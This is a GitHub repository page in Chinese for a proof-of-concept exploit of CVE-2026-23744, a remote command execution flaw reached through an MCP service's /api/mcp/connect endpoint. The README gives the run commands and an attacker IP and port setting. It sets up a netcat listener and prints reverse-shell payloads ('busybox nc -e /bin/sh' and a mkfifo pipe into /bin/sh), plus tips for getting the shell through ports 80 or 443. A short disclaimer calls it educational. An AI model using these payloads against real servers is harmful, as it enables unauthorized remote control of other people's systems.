H1sok444/CVE-2026-23744-PoC

GitHub: H1sok444/CVE-2026-23744-PoC

针对 CVE-2026-23744 MCP 服务远程命令执行漏洞的概念验证脚本,可通过反向 shell 获取目标主机访问权限。

Stars: 0 | Forks: 0

# CVE-2026-23744-PoC # MCP RCE Exploit (Linux) 利用 `/api/mcp/connect` 实现远程命令执行的 PoC。 ## 环境要求 ``` pip install requests ``` ## 使用方法 ``` python3 exploit.py ``` 示例: ``` python3 exploit.py mcp.something.com ``` ## 配置 (在脚本中编辑) ``` attacker_ip = "YOUR_IP" port = 4444 ``` ## 监听器 ``` nc -lvnp 4444 ``` ## Payload 默认: ``` busybox nc -e /bin/sh ``` 备选: ``` rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc > /tmp/f ``` ## 注意事项 * 如果没有 shell,请尝试端口 80/443 * 如果 `-e` 失败,请使用备选方案 ## 免责声明 仅供教育用途。
标签:API安全, Busybox, CISA项目, CVE-2026-23744, Exploit, JSON输出, MCP, Netcat, PoC, Python, RCE, 攻击脚本, 无后门, 暴力破解, 概念验证, 渗透工具, 漏洞复现, 编程工具, 网络安全, 远程代码执行, 逆向Shell, 逆向工具, 隐私保护